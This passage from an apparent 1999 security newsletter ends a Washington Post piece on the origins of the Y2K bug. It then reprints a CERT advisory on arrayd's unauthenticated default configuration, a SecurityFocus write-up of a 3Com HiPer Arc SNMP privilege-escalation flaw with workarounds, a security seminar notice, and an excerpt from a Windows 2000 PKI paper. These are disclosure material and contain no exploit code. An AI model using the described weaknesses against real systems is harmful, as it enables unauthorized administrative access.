Orwellian scenario. ComputerWorld magazine reviewed it thus: "The book overdramatizes the date-digit problem. . . . Much of the book can be overlooked." How could we have been so blind? Basically, we blinded ourselves, like Oedipus. It seemed like a good idea at the time. Imagine you own a car that gets one mile to the gallon, and every additional ounce in the passenger compartment further reduces the gas efficiency. You would do anything you could to lighten your load. You might even drive naked, gawkers be damned. That's pretty much what occurred back in the 1950s, in the early days of computers. Simple arithmetic calculations required a machine the dimensions of a minivan. Memory was contained not in chips the size of fingernails but in electrostatic vacuum tubes the size of cucumbers; small stores of memory cost tens of thousands of dollars. Data were entered by punching holes in stiff cards the size of airline tickets, each containing only 80 characters of information. Businesses needed warehouses to store tons of cards. Anything that reduced the amount of data, even slightly, saved money. What followed was nearly inevitable. Programmers built a house of cards. Most of them employed abbreviations, particularly to represent prosaic bits of recurring data, such as the date. They expressed the month, day and year in a total of six digits rather than eight. Many programmers say today that they knew they were being sloppy. But there were greater priorities. So they drove naked. Why didn't people realize earlier the magnitude of the problem they were creating? And when they did realize it, why was the problem so hard to solve? Have Run, Will Travel We sought the answer from the first man to ask the question. Robert Bemer, the original Y2K whistleblower, lives in a spectacular home on a cliff overlooking a lake two hours west of a major American city. We are not being specific because Bemer has made this a condition of the interview. We can say the car ride to his town is unrelievedly horizontal. The retail stores most in evidence are fireworks stands and taxidermists. In his driveway, Bemer's car carries the vanity tag "ASCII." He is the man who wrote the American Standard Code for Information Interchange, the language through which different computer systems talk to each other. He also popularized the use of the backslash, and invented the "escape" sequence in programming. You can thank him, or blaspheme him, for the ESC key. In the weenieworld of data processing, he is a minor deity. We had guessed Bemer would be reassuring about the Y2K problem. Our first question is why the heck he recently moved from a big city all the way out to East Bumbleflop, U.S.A. It's a good place to be next New Year's Eve, he says. From a kitchen drawer he extracts two glass cylinders about the size of the pneumatic-tube capsules at a drive-through teller. Each is filled with what appears to be straw. "They're Danish," he says. "They cost $500. We ran water with cow[poop] through them and they passed with flying colors." They're filters, to purify water. If Y2K is as bad as he fears, he says, cocking a thumb toward his backyard, "we can drain the lake." Bemer is 79. He looks flinty, like an aging Richard Boone still playing Paladin. He has started a company, Bigisoft, that sells businesses a software fix for the Y2K problem. So, for selfish reasons, he doesn't mind if there is widespread concern over Y2K, though he swears he really thinks it is going to be bad. That's why he has requested that we not mention the town in which he lives. He doesn't want nutballs descending on him in the hellish chaos of Jan. 1, somehow blaming him. Who, then, is to blame? Bemer rocks back in his chair and offers a commodious smile. In one sense, he says, he is. Binary Colors In the late 1950s, Bemer helped write COBOL, the Esperanto of computer languages. It was designed to combine and universalize the various dialects of programming. It also was designed to open up the exploding field to the average person, allowing people who weren't mathematicians or engineers to communicate with machines and tell them what to do. COBOL's commands were in plain English. You could instruct a computer to MOVE, ADD, SEARCH or MULTIPLY, just like that. It was a needed step, but it opened the field of programming, Bemer says, to "any jerk." "I thought it would open up a tremendous source of energy," he says. "It did. But what we got was arson." There was no licensing agency for programmers. No apprenticeship system. "Even in medieval times," Bemer notes dryly, "there were guilds." When he was an executive at IBM, he said, he sometimes hired people based on whether they could play chess. There was nothing in COBOL requiring or even encouraging a two-digit year. It was up to the programmers. If they had been better trained, Bemer says, they might have known it was unwise. He knew. He blames the programmers, but he blames their bosses more, for caving in to shortsighted client demands for cost-saving. "What can I say?" he laughs. "We're a lousy profession." Some contend that the early programmers were unconcerned about the year 2000 because they expected their programs to last only a few years. If that is true, it was naive. Computers are forever becoming obsolete, replaced by faster, better technologies, but the programs they run can be nearly immortal. A good program is self-perpetuating, tested over time, wrinkles ironed out through updates, a solid foundation for all that follows. The house above it may be fancified, with spiffy new wings and porticoes, but the foundation remains. Which goes to the heart of the Y2K problem. The longer a program is used, the larger the database and supporting material that grow around it. If, say, a program records and cross-references the personnel records in the military, and if the program itself abbreviates years with two digits, then all stored data, all files, all paper questionnaires that servicemen fill out, will have two-digit years. The cost of changing this system goes way beyond the cost of merely changing the computer program. It's like losing your wallet. Replacing the money is no sweat. Replacing your credit cards and ATM card and driver's license and business-travel receipts can be a living nightmare. And so, even after computer memory became cheaper, and data storage became less cumbersome, there was still a powerful cost incentive to retain a two-digit year. Some famously prudent people programmed with a two-digit date, including Federal Reserve Chairman Alan Greenspan, who did it when he was an economics consultant in the 1960s. Greenspan sheepishly confessed his complicity to a congressional committee last year. He said he considered himself very clever at the time. In their omnibus 1997 manual for lawyers planning Y2K litigation--an excellent if unnerving document of 600-plus pages--attorneys Richard D. Williams and Bruce T. Smyth suggest that IBM and other computer manufacturers might be partially at fault for not addressing the problem in the early '60s by advising their customers of the wisdom of a four-digit year. In 1964, IBM came out with a its System/360 computers, which revolutionized the industry. It built upon existing programs, yet required much new software. Should IBM have seized the moment to make things right? "That would have been stupid," responds Frederick Brooks, a University of North Carolina computer science professor. In the 1960s, Brooks was IBM's project manager for the System/360. The average 360, he says, had either 16 or 32 kilobytes of memory, 12 of which were needed to run the operating system. What was left was less memory than is available today in a hand-held personal organizer from Radio Shack. Every possible memory-conserving device had to be employed. And the year 2000 was far, far away. "I never heard anyone seriously propose a four-digit year," he recalls. It is not as if a two-digit year was set in stone anywhere, he says. It just became a logical convention, across the industry. So Y2K was inevitable? No. As time passed and memory became cheaper and the end of the century got closer, Brooks says, "the cost of using four-digit years went down gradually, and the wisdom of using them went up gradually." When did the two lines cross on the graph? Around 1970, he says. But competitive pressures kept managers from making that expensive decision. By the mid-1980s, it was too late. Computers were everywhere, their programs hopelessly infected with the problem. Could anything have changed corporate attitudes earlier? The former IBM man ponders this. "If we had adopted industry-wide standards by some standards group, standards everyone would have had to follow, there would be no competitive pressures for cost." But nothing like that ever happened, he says. Actually, Brooks is wrong. Something very much like that happened. A group did adopt a written standard for how to express dates in computers. We are looking at it now. It is a six-page document. It is so stultifying that it is virtually impossible to read. It is titled "Federal Information Processing Standards Publication 4: Specifications for Calendar Date." It is dated Nov. 1, 1968, and took effect on Jan. 1, 1970, precisely when Brooks says the lines on the graph crossed, precisely when a guiding hand might have helped. On Page 3, a new federal standard for dates is promulgated. Sometimes, someone makes a reasonable-sounding statement that, in the merciless glare of history, seems dreadfully unwise: "Separate but equal" is one of these. Also: "I believe it is peace in our time," an opinion rendered by Neville Chamberlain weeks before the outbreak of World War II. Federal Information Processing Standards Publication 4, Paragraph 4 and Subparagraph 4.1, is another of those statements. Here it is, in its entirety: Calendar Date is represented by a numeric code of six consecutive positions that represent (from left to right, in high to low order sequence) the Year, the Month and the Day, as identified by the Gregorian Calendar. The first two positions represent the units and tens identification of the Year. For example, the Year 1914 is represented as 14, and the Year 1915 is represented as 15. Ah. The Y2K problem. Set in stone. By the United States government. FIPS 4, as it was called, was limited in scope. It applied only to U.S. government computers, and only when they were communicating from agency to agency. Still, it was the first national computer date standard ever adopted, and it influenced others that followed. It would have affected any private business that wanted to communicate with government computers. It might have been a seed for change, had it mandated a four-digit year. It was a missed opportunity. Who screwed up? The Standard Bearers Harry S. White Jr., 64, places a briefcase on the table. It is heavy. He has documents. We are meeting in a conference room at a Holiday Inn in Morgantown, W.Va., to plumb ancient history. White helped write FIPS 4; at the time he was with the National Bureau of Standards. White says he is pleased to meet us. He holds out a hand. In it is a Bible. "Be careful with that," he says mildly. "It's powerful. If you open it, it will have an impact on your life." White is West Virginia chairman of The Gideons International, the gentlemen's organization that places Bibles in hotel rooms. He is now semi-retired, but for much of his life he was an expert on standardizing computer codes, a scientist whose field involved the proper sequencing of digits and symbols. God, they say, is in the details. In the 1960s and '70s, White was one of a few dozen computer experts who met regularly on committees to try to get government and industry to use identical conventions in programming. It was an important job, but a thankless one. Programmers sometimes consider themselves as creative as novelists; to them, standards experts are squinty-eyed, pencil-necked editors--necessary, perhaps, but nit-picky and annoying. In this insular world, all debates are about small things; so small things can become very large. Harry White says that back in 1968, he was opposed to a two-digit year. He did not exactly foresee the extent of the Y2K problem but there was something about two digits that offended his sense of the rightness of things: "If it is four digits," he says, "it is everlasting." But FIPS 4 was produced by a committee, White explains. A committee. When a committee tries to design a horse, it can come up with a jackass. On the committee were representatives of several government agencies, among them the Office of Management and Budget, NASA, the General Services Administration and the Department of Defense. Defense was by far the biggest computer user in the federal government, probably in the world, White says, and its input was disproportionately influential. The Defense Department, he says, opposed the four-digit year because it would have meant rewriting all its programs, and all the supporting data. Defense had bigger worries. We were neck deep in Vietnam. Besides, White says, there was a much larger issue on the table: the precise order in which the day, month and year would be written. DOD wanted to keep its system, familiar to Europeans and the American military: day/month/year. Others wanted the standard month/day/year sequence, the way Americans write it on personal correspondence. Whether years would be four digits or two seemed a minor matter. Even those people like Bemer and White, who sensed a problem, had no real understanding of its potential scope: In the 1970s few people anticipated how thoroughly computers would come to dominate our lives. Eventually, White says, Defense gave up on the issue of the order of the date, but it held fast on the two-digit year. Three years later, the American National Standards Institute issued its own voluntary standard for expression of date in computer language. This was ANSI standard X3.30, which was drafted by, and for, both government and industry. Harry White was chairman of the subcommittee that addressed the issue of date. The Defense Department, White says, remained solidly opposed to change: It stuck to its guns, as it were. The initial proposal was for a two-digit year, just like FIPS. But eventually, White said, he and others prevailed. The final standard was for a four-digit year, including the prefix 19- or 20-. But as a compromise with the Defense Department, White says, the Standards Institute added an option: Programmers could stick with a two-digit year if they wanted to. That gave everyone an out. In essence, government and business programmers could choose to adopt the recommended standard, at the cost of many millions of dollars, or they could ignore it completely, without technically having committed a sin. "That," says Robert Bemer, "was devastating. It was an excuse to put it on the shelf." Who screwed up? Was anyone in particular behind this? Harry White shuffles his papers. "The director of data standards for the Office of the Secretary of Defense. I used to work for him." Who was he? "I don't want to give the impression that I was a hero and he was a bad guy. There was just a difference in making judgments and decisions." Give us a name, Harry. "Bill Robertson. He married his assistant, Mildred Bailey. " Harry and Bill Bill and Mildred are amiable, despite being ambushed in their jammies in their Baileys Crossroads apartment. They are wearing socks and slippers. She is redheaded, lean and energetic. He is solidly built, a little deliberate afoot. We tell them why we are there. "Anyone who says the Department of Defense was against the four-digit year is full of crap," Bill Robertson says. "Harry White made that up out of his own imagination, whole cloth." The issue never came up, Robertson said, at least not exactly that way. Robertson and Bailey both deny their office was ever even consulted on the FIPS 4 regulation, though it did have input into the ANSI standards. Robertson says he does not recall ever being asked to comment specifically on a four-digit year, though he agrees the Department of Defense did in general oppose major changes to its computer system. Change would have been costly. The various armed services would not have stood for it. "We would have had to change every stinking file," Bailey says. "We would have had a revolt," Robertson says. If someone had ordered them to change, "we would have said, 'Blow it out your airbag.' " However, it was all moot, he claims. The Department of Defense already had a system for recording the date, a system Robertson helped develop and implement back when he was in the Air Force. Robertson wanted it to be a national system. What was their system? It had a two-digit year in it, he says. Aha! But, Robertson says, his system included something else. A date was designated by "data elements." The month, year and day were only three elements of five. There was another element, for optional use, that would have indicated which century it was, and yet another indicating which millennium. If you chose to put those in, it would tell the computer to distinguish between centuries. It was the solution to the Y2K problem, but it was never adopted nationally. Bill's system never would have worked, Harry replies: "See, this is where we ran into that kind of problem with him! This was his definition of data elements, but the rest of the world would not accept this definition!" Harry says Bill was "a very narrow, bullheaded individual. When it came to matters of being able to compromise, he was totally inflexible." Bill says Harry was the bullheaded one. He wouldn't listen to reason. Wouldn't join him in his data elements program. "We had the answer in 1964. Harry never tried to get on board!" Once, Bill says, Harry got into a shouting match with one of Bill's deputies on a philosophical dispute about how to express the concept of midnight. It nearly came to blows. Harry says Bill was envious of him because he eventually rose above Bill, his former boss, to a position of higher authority in the field of data standards: "He never got over it," Harry says. Bill says Harry was the envious one, ever since the day Bill beat him out for the Department of Defense standards job. "Harry and I interviewed for the same job. Has it occurred to you why I got it and he didn't? He didn't understand standards!" Did too, Harry says. Did not, Bill says. James Gillespie was a computer standards man for the Navy. He worked with both White and Robertson, on ANSI deliberations. He liked them both, he said, but the two men could not get along. "They had a personality conflict that impeded progress," Gillespie said. For some danged reason, the negotiations over computer date lasted a very, very long time. And for some danged reason, nothing very handsome was accomplished. In the end, what was produced was FIPS 4 and ANSI X3.30, neither of which protected the world against Y2K. Today, both Harry and Bill scorn the FIPS 4 and ANSI X3.30 standards as weak and muddled. It may be the only thing in the whole entire world they agree on. File Not Found We've tried to further research this Harry-Bill contretemps. Many of the participants are dead; others' memories are indistinct. Harry says there should be a paper trail showing the Defense Department's complicity in all this--but the official government file on the FIPS 4 document is as thin as leaf. There's no paper trail. Harry suspects chicanery: He theorizes the records were either "shredded or placed where they are not in the public domain." A spokesman for the National Institute of Standards and Technology, keeper of the FIPS files, confirms that other FIPS regulations have bulging folders, but not FIPS 4. He does not know why, but says there is no evidence any larger file ever existed. There is certainly no coverup, he said. Ruth Davis is president of the Pymatuning Group, a technical management firm in Alexandria. In the 1970s, she was Harry White's boss at the National Bureau of Standards. She remembers Harry being apoplectic at the intransigence of the Department of Defense on the issue of the four-digit year. But she says she never really blamed DOD. The cost, she said, would have been huge. Davis had once worked for Defense, and understood the necessity of saving space. At times, she said, it was a life-or-death priority. Back then, she said, Defense had to maintain control of rockets during their launches. Calculations had to be made in real time. This required quickness, which required computer memory. They couldn't screw around with four-digit dates. She said it would be wrong to blame any one person at DOD. It was policy, top to bottom. Plus, it made sense. So we can't blame Bill? "You can't blame anyone." Damn. Tomorrow Is Another Day Maybe we're looking at this thing all wrong. Maybe it isn't about people, at all. Maybe it is just about numbers. Maybe, in the early days, there simply never was a good solution to a basic problem of space: A six-digit date was much more economical than eight. Maybe a problem at century's end was unavoidable, since you could not possibly express the date unambiguously in six digits alone. Except, you could. Astronomers do. They deal in distances so vast that light takes millions of years to traverse them. So astronomers are forever having to add and subtract time periods that span centuries. Since the 1700s, they have found a simple way to do this, with a minimum of figuring or adjustment for leap years and the like: They use something called the Julian day number, adapted from the ancient Julian calendar. In this system, the day Jan. 1, 4713 B.C., is arbitrarily taken as Day 1, the beginning of time. And every day thereafter is numbered sequentially, as a single number. For example, Jan. 1, 2000, the day of the presumed Y2K Armageddon, would be Julian Day 2,451,545. In Julian day calculations, there is never a need for Month, Day, or Year. There is no ambiguity about centuries, because there is no century. Julian day numbers are, at least theoretically, the perfect solution to the Y2K problem. The modern Julian day number is seven digits long. But, if you used it in computers, you could safely drop the first one. That abbreviation would eventually create a Y2K-type ambiguity, but that ambiguity would not occur until A.D. 3501, when the Julian date would hit 3,000,000. By then we might all have big, bald heads and no teeth and do our computing telepathically. If the Julian day had been used in computers--it could have been since 1963, when an algorithm was written to perform the conversion automatically--it would have conserved memory. For microprocessor chips, no conversion would even have been necessary; they could have been programmed directly with the Julian date. This was actually considered. Thomas Van Flandern, an astronomer at the University of Maryland, believes that if data processors had adopted the Julian date in 1963, the Y2K problem would not exist. In fact, he says, this was once a hot topic among astronomers. They wanted to recommend it: "There was a lot of discussion about it at the Jet Propulsion Laboratory," he recalls. "But it broke up into small pools." Astronomers simply couldn't get together on it, Van Flandern says. Basic philosophical disputes arose. The movement disintegrated, he says, because it became polarized. On one side were those who wanted to change all calculations, such as expressing all angles not in degrees but in radians. On the other side were people who wanted to change nothing. They fought. Those simply advocating a Julian date for computers were lost in the din. Nothing got done. And the Julian date issue died. So maybe the Y2K problem is about people after all. Nixon's the One? We had one more lead on someone to blame. A last-ditch theory. It was a good theory. It promised us a fabulous villain. We were excited. In the early 1970s, Robert Bemer remained bugged, as it were, by the problem of the two-digit year. He discussed it with acquaintances. One of these was Edward David, the science adviser to the president of the United States. Bemer says he urged David to take the matter to the White House. To the president himself, if need be. The president was . . . Richard Nixon. Clearly, this merited further investigation. Edward David is 74. He is president of EED Inc., a computer consulting firm in Bedminster, N.J. Yes, he recalls, Bemer did discuss the two-digit year with him. And yes, David agreed with Bemer that it might be a problem. "I know computers," David says. "I know how stupid computers are." And yes, David says, Bemer urged him to take it up at the highest levels. Did he talk about it with, y'know . . . Nixon? "No." So much for the perfect villain. "I discussed it with my staff," David says. "I discussed it with some other agencies." He certainly talked to people in the Office of Management and Budget, he says, and possibly in John Ehrlichman's office, or George Shultz's. David does not recall names, but he recalls the reaction. People, he says, "wagged their head sagely and said this problem is simply not on the radar screen." In particular, he remembers this fairly universal response: "It's 30 years in the future. We'll be out of office. Leave it to the civil servants. They'll still be here." The Sting of the Bug It's not my problem. It's not on my watch. He's full of crap. They're jerks. He won't listen to reason. She's jealous. What's he trying to pull? Blow it out your airbag. A people problem. No one wanted the Millennium Bug. No one hatched it. But no one bottled it up when they had the chance, and here it is. It's the same way with warfare: No one wants it. Everyone tries to avoid it. And here it is. The Y2K problem is not a computer problem, after all. It was not hard-wired into the mechanical brains themselves, as some have contended. It was hard-wired into the human brain. We want to be enlightened. But our wisdom falls victim to greed and hostility and covetousness and expedience. It's human nature. A people problem. We didn't want a people problem. We wanted a person problem. Someone to blame. With Y2K, there is only one fact about which most everyone agrees: It happened in large measure because computers were invented in the center of the century. It was an accident of timing. The first electronic digital computer, ENIAC, was unveiled in 1946. Let's say this had occurred in 1996. The next century would have been right around the corner, barreling at us. Yes, some programs would have been able to ignore it, but the majority would not. Simple mortgages would have had to accommodate the new century. The balance would be tilted. The state of the art would have to be the four-digit date, despite the cost. Few computer experts doubt this. And if computers had been invented in, say, 1912, the same thing would have happened in reverse. The birthdays of 80 percent of the American population would have had to be expressed as part of a previous century. Arithmetic involving ages, dates of employment, home purchases, anything that looked remotely into the past would have similarly had to account for the 1800s. But where does this get us? It's impossible to second-guess the march of progress. Science proceeds at its own pace. Inventions beget other inventions. Computers happened when they were ready to happen. Not before or after. But why did that moment fall at the center of the century? Can the calendar itself be second-guessed? S. Thomas Parker is a professor of history at North Carolina State University. He is an expert on time measurement. We got his name from an Internet search. (Computers. They're magic.) We explain our predicament. We need to find someone to blame for the fact that the year 2000 is arriving in six months, and not at some other time. In other words: Why 2K? Parker thinks about this. He consults a book. And finds us our patsy. Dennis the Menace? Most likely, he dressed in coarse brown robes woven from hemp. He was a Scythian monk who lived in Rome in the 6th century A.D. His name was Dionysius Exiguus, which translates, roughly, into "Dennis the Short." Dennis may well have been a small man, but scholars suspect he took the moniker as a sign of humility. Parker explains that before Dennis the Short, time was reckoned in various ways; some figured the date by the number of years since the election of the current pope. The most common system for counting time, however, was dating it from the founding of Rome in what is now considered 753 B.C. Dennis the Short is widely credited with having created the modern calendar. In A.D. 525, he is said to have proposed dating the Christian era from the birth of Jesus, and persuaded the papacy this was a good idea. Dennis calculated this to be the year we now call A.D. 1. It took centuries, but eventually this system was adopted throughout the Christian world. But Dennis was wrong, Parker says. He miscalculated. If the Scriptures are to be believed, Jesus was certainly born during the reign of Herod the First, the king who ordered the death of all male babies in Judea after hearing of the birth of a messiah. Herod died in 4 B.C. That means Jesus was born at least four years earlier than Dennis reckoned. Which means all dates should be four years later than we think. Not good enough. It would not have mattered appreciably if computers had been invented in 1950 instead of 1946. Parker considers this. Well, he asks, why did Dennis the Short fix the start of the Christian era at the birth of Christ? "Resurrection is the true beginning," he says. Good point. Christ died a Jew. His last supper was a seder. The Christian era should begin not with his birth but his death. He is thought to have died around A.D. 34, during the latter years of the tenure of Pontius Pilate, Judea's Roman prefect. Shorty turned over the hourglass 34 years too soon! Let's recalculate time. A.D. now means what schoolkids have always thought it meant: After Death. The U.S. was birthed in Philadelphia not in 1776 but 1742. The Civil War began in 1826. The stock market crashed in 1895. And ENIAC debuted in . . . 1912. Pretty soon thereafter, the Department of Defense had a problem. It really, really, wanted to program its computers using a two-digit year. But gosh darn it, this just wasn't practical. Half of all servicemen were born in the previous century. Industry faced similar problems. When they could, programmers still used a two-digit date. But most could not. The four-digit year became the rule, not the exception. Today is Sunday, July 18, 1965. The century will not end for 34 years. But computers will have been programmed correctly. There will be no millennium bug. The Villain, Unmasked It's not Dick Nixon. It's not Bob Bemer. It's not Ed David. It's not Alan Greenspan. It's not Bill. It's not Harry. It's Shorty. He's the one who screwed up. Big time. Special correspondent Bob Massey contributed to this report. © Copyright 1999 The Washington Post Company . @HWA 45.0 CERT ADVISORY CA-99-09 ~~~~~~~~~~~~~~~~~~~~~~ by BHZ, Tuesday 20th July 1999 on 1:45 am CET CERT released new security advisory. "A vulnerability has been discovered in the default configuration of the Array Services daemon, arrayd. Array Services are used to manage a cluster of systems. The default configuration file, arrayd.auth, disables authentication and does not provide adequate protection for systems connected to an untrusted network". Read the advisory below; CERT Advisory CA-99-09 Array Services default configuration Originally released: July 19, 1999 Source: CERT/CC Systems Affected * IRIX systems running the Array Services daemon * UNICOS systems running the Array Services daemon I. Description A vulnerability has been discovered in the default configuration of the Array Services daemon, arrayd. Array Services are used to manage a cluster of systems. The default configuration file, arrayd.auth, disables authentication and does not provide adequate protection for systems connected to an untrusted network. SGI has published the following document describing the vulnerability and solutions: ftp://sgigate.sgi.com/security/19990701-01-P II. Impact On systems installed with the default configuration, remote and local users can execute arbitrary commands as root. III. Solution Use "SIMPLE" authentication Reconfigure arrayd to use "SIMPLE" authentication. For more information about reconfiguring arrayd, please see the SGI security bulletin. Disable the arrayd daemon If you do not need the capabilities provided by the arrayd daemon, you may wish to disable the daemon. _________________________________________________________________ The CERT Coordination Center would like to thank Yuri Volobuev and the SGI Security Team for their assistance in preparing this advisory. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-99-09-arrayd.html. ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key. If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/. To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message. Copyright 1999 Carnegie Mellon University. Conditions for use, disclaimers, and sponsorship information can be found in http://www.cert.org/legal_stuff.html. * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. Revision History July 19, 1999: Initial release -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBN5N5q3VP+x0t4w7BAQGo1QQApyCUoV27rxMD4w3bOI9Ylvxk0eFnImVf XEpRSW74HHHMyPrBC4mltDYjrwX1gXGHR9WK8E9dSGfJju89vFR1IBrp7fZmARCx YDp1z9XNBAUe/0U2QiW7D/ALfvcVamviSuwAKiZY4ECxL6jtwBF6AYOpEUnOkxYG tiqdDO3EWjY= =Uzpa -----END PGP SIGNATURE----- @HWA 46.0 Tracking Criminals With New Technology ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ via http://www.securityfocus.com/ 21/07/99 14:54 Tracking criminals with new technology Selina Mitchell The Federal Government has called for tenders to build a national crime investigation system. The government has set aside $50 million over three years to establish CrimTrac, which it is hoped will make policing easier across the nation. CrimTrac will be developed in stages, the first being a new and enhanced National Automated Fingerprint Identification System (NAFIS). This should be operational before the Sydney Olympics, said Minister for Justice and Customs, Senator Amanda Vanstone. It would not be sensible to have an old fingerprint system running when so many people would be in the country, she said. "Australia's current fingerprint system has been in place since 1986, and will run out of capacity in 2001. It relies on printers ink technology scarcely changed in one hundred years." The new system will support an inkless process that uses electronic and laser technology, known as livescan. Following this, a national DNA database and a national child sex offender register will be set up. The government is also promising fast access to operational information, including domestic violence orders, missing person and stolen vehicle information. Vanstone could not give an exact timetable for implementation, but did say it would be less than a couple of years. In order to be useful, all states and territories will need to supply information to the databases. All relevant governments supported the new technology and if anyone wanted to try to find a police commissioner who didn't like the scheme they would have to pack a very big lunch, Vanstone said. While private industry has been called on to build the system (providing the technology and solutions), it will be run by the public sector. A range of legal and technical safeguards will be employed, she said. CrimTrac's successful tenderer, and anyone working on it, will be subject to Commonwealth privacy laws (the Privacy Act and the Crimes Act). Also, CrimTrac will operate on a need-to-know basis. Access will be provided to authorised officers only. The access control architecture will include secure identification, immediate warning of unauthorised users, access only to relevant data, firewalls and encryption, and audit logs and trails. The CrimTrac tender is in two parts: the urgent replacement of NAFIS and the possible appointment of a long-term systems integrator for the system to work in partnership with the government and police services. That partnership (possibly with further tenders) will set up the other pieces of the CrimTrac system. It is expected that contracts for the new NAFIS will be signed in November, and contracts for the systems integrator will be signed a month later. The request for tender is available from http://www.law.gov.au/. This article is located at http://www.newswire.com.au/9907/tracki.htm @HWA 47.0 3Com HiPer Arcs Community Name Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.securityfocus.com/ On 3Com HiPer Arc cards (and possibly others using the Pilgrim source base), it is possible to gain administrative snmp privileges remotely if you have a valid community string (of any access level). There are three levels of access in the card, read-only, read-write and administrative. The community strings are readable to all levels and makes it possible for an attacker to gain administrative privileges (needing only to view the community string in the usrSnmpCommAccess table and others like it). With administrative access, the attacker can perform a number of malicious activities possibly leading to further compromise (ie, repopulating the arp cache). There may be other 3com devices vulnerable to this attack. There are two workarounds to this problem. The first involves restricting certain community strings to ip address(es). This is only marginally more secure and the snmp community strings are still readable. The second involves not defining community strings on the Arc at all. To do this, you need the NMC (Network Management Card) to act as a relay to the HiPer Arc. The NMC's community string needs to be communitystring@ (ie, public@16000), entity being the location of the Arc (ie, slot 16 = 16000). To send an SNMP command to the Arc, assuming its in slot 16, and assuming an NMC community string of "public" for example purposes, you'd use the community string of "public@16000". The only real drawback to this workaround is the extra load that is put on the NMC cards (many of which are only 486 processor based...none-too-overpowered), and that the SNMP operations are slowed down by having to be processed through another system. Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com. First posted to BugTraq by Jeff Mcadams on July 20, 1999. Some of the solution taken directly from Jeff's BugTraq posting. @HWA 48.0 Aleph One in Tokyo ~~~~~~~~~~~~~~~~~~ Bugtraq moderator Aleph One will be taking his expertise to Tokyo for a three day seminar on 'exploits and how to stop them' ... here's an excerpt from the itinary http://www.lac.co.jp/security/seminar/tokyo090899.html -How to find security holes and how to fix- Instructor Aleph One (Bugtraq ML moderator) with interpretation Date September 8-10, 1999 Plac TIME24 Building, AOMI 2-45, KOTO-KU,TOKYO, JAPAN http://www.lac.co.jp/profile/direction_e.html Aleph One, a moderator of Bugtraq Mailing List well-known among security community, will come to teach us how to discover security holes and how to fix them. Also you will learn 'who' finds vulnerabilities and 'who' misuses them. It is a great opportunity to ask Aleph questions face to face in Japan. Our SecureNet Service team will, for those who have technical difficulties, support you during the class. Contents Wednesday, September 8 10:00-10:45 What is Bugtraq ML? 10:45-11:45 What are security holes and who find them? 11:45-13:00 Lunch 13:00-17:00 Typical Linux vulnerabilities 9th Sep (Thu) 10:00-11:45 Latest Linux vulnerabilities 11:45-13:00 Lunch 13:00-17:00 Latest Linux vulnerabilities 10th Sep (Fri) 10:00-11:45 Typical SunOS/Solaris vulnerabilities 11:45-13:00 Lunch 13:00-17:00 SunOS/Solaris vulnerabilities Security holes for this class will focus on : Remote buffer overflow to get unauthorized privilege Local buffer overflow to get root privilege Remote unauthorized login through holes @HWA 49.0 Windows2000 introduces Public Key Encryption ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From OSALL PKI Encryption In Windows 2000 OSAll Staff Microsoft has announced that the upcoming release of Windows 2000 will include built-in support for public key encryption. The support will actually be integrated from the ground up in the Windows 2000 security infrastructure. Windows´ built-in security has been always been notorious for it´s insecurity. Windows 2000, which is a melding of Windows 9x and Windows NT, is touted by Microsoft as a more secure operating system. The integration of public key encryption is another step in that direction, according to Microsoft. Programs like Pretty Good Privacy already allow for public key encryption, but they´re not automatic like Microsoft´s seems to be. Windows 2000´s public key integration is built more as a system for the use of other software more than to integrate encryption into Windows 2000. The white paper detailing the integration of public key encryption in Windows 2000 is mirrored in HTML format on OSAll. The only way to receive this white paper from Microsoft is in self-extracting .DOC format. http://www.aviary-mag.com/Archive/News/Public_Key_Cryptography_In_Win/PKI_in_Win2k_White_Paper/pki_in_win2k_white_paper.html White Paper Abstract Microsoft® Windows® 2000 introduces a comprehensive public-key infrastructure (PKI) to the Windows platform. This infrastructure extends the Windows-based public-key (PK) cryptographic services introduced over the past few years, providing an integrated set of services and administrative tools for creating, deploying, and managing PK-based applications. This allows application developers to take advantage of the shared-secret security mechanisms or PK-based security mechanism in Windows, as appropriate. Enterprises also gain the advantage of being able to manage the environment and applications with consistent tools and policies. © 1999 Microsoft Corporation. All rights reserved. The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information presented after the date of publication. This White Paper is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS DOCUMENT. Microsoft, ActiveX, Authenticode, Outlook, The BackOffice logo, Windows, and Windows NT are registered trademarks of Microsoft Corporation. Other product or company names mentioned herein may be the trademarks of their respective owners. Microsoft Corporation One Microsoft Way Redmond, WA 98052-6399 USA 0499 Contents Introduction1 Concepts2 Public Key Cryptography2 Public-Key Functionality2 Digital Signatures2 Authentication3 Secret Key Agreement via Public Key3 Bulk Data Encryption without Prior Shared Secrets3 Protecting and Trusting Cryptographic Keys4 Certificates4 Certificate Authorities4 Trust and Validation5 Windows 2000 PKI Components6 Certificate Authorities8 Certificate Hierarchies8 